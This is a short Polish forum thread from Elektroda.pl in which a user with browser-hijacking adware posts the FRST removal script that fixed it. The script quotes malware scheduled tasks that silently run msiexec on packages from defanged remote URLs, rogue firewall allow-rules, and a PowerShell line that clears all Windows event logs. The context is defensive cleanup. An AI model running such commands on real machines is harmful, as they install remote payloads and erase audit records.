Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Wirus blokuje przeglądarke i programy typu adwcleaner

Vinez 23 Paź 2018 11:50 132 1
  • #1 23 Paź 2018 11:50
    Vinez
    Poziom 2  

    W trybie awaryjnym wszystko jest ok, ale jak przejde na normalny tryb przeglądarka się wysypuje przy wpisie adwcleaner lub FRST. Co jakiś czas wyskakują reklamy. Moja przeglądarka to Firefox. Po skanie w trybie awaryjnym brak efektów. Załączam logi z FRST w trybie awaryjnym

    0 1
  • #2 23 Paź 2018 13:19
    Vinez
    Poziom 2  

    Problem rozwiązany przez znajomego

    Cytat:
    Task: {93606787-42AC-4157-9B78-52CA34A95B96} - System32\Tasks\{E70954F9-3B5E-48C6-00D1-147DD5D0E3FB} => "msiexec" /i hxxp://inthemel.info/odmphhrdldsn.gpq /q

    Task: {E159CA47-A9BB-4C00-A40A-3123937158E0} - System32\Tasks\{04A513BD-27AC-5D0D-92A5-CF095635AE44} => "C:\Program Files\Mozilla Firefox\firefox.exe" hxxp://mynewsfor.net/cl/?guid=kh7yj6qj8ilvvxx8cl4glhrdcb0loiuz&prid=1&pid=4_1324_0
    Task: {E5701B47-3C75-45B0-8063-4381E24E40DD} - System32\Tasks\{D0D2ED2F-E808-E336-C2AC-C348ED0D4BD2} => "msiexec.exe" -q /package hxxp://inthemel.info/93fkt2fu1z1d.kye
    C:\Users\Szymon\AppData\Local\cwoPE.exe
    C:\Users\Szymon\AppData\Local\iCeY.exe
    C:\Users\Szymon\AppData\Local\imw.ini
    FirewallRules: [{0ECB5482-F950-4AF3-A883-1BCEAD6890B1}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
    FirewallRules: [{51E095A7-1054-44BC-A57C-C3519654644E}] => (Allow) C:\Users\Szymon\AppData\Local\cwoPE.exe
    FirewallRules: [{44A93EC5-7A1D-4516-9041-EBCD6995B857}] => (Allow) C:\Users\Szymon\AppData\Local\iCeY.exe
    FirewallRules: [{48E0B4C3-2058-4B70-9C65-237ED9302914}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{28EAFC76-A224-4D2D-A409-05F1F169FA0F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{F15C4359-F356-4B00-9C42-02194FB3496C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{C9AE838B-28DF-4B15-9259-7FCE4A271774}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{BE592044-44E4-4A99-A50C-DAF70770D326}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{CCB7AB3C-3630-4D8E-BD56-66DBACE75EA6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{AEDB21F4-21A3-49DC-9512-48469CE98068}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{2072B5D7-340A-4230-B387-FEF4377CC250}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{41E6DD64-8357-4AE9-8A0D-59368CFEF361}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{BEB00C69-99E1-45E2-B5DD-45DBF0E1B01E}] => (Allow) C:\Windows\SysWOW64\tracert.exe
    FirewallRules: [{BFAD48CE-AB69-4721-A69B-DAE8F13FE68F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{CBEF0165-3437-4316-A7F9-EDE66C67B402}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{58100FAE-771A-4490-A9EE-F3FDD8B63570}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    S3 cpuz130; \??\C:\Users\Szymon\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] <==== UWAGA
    S3 gdrv; \??\C:\Windows\gdrv.sys [X]
    Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
    EmptyTemp:

    0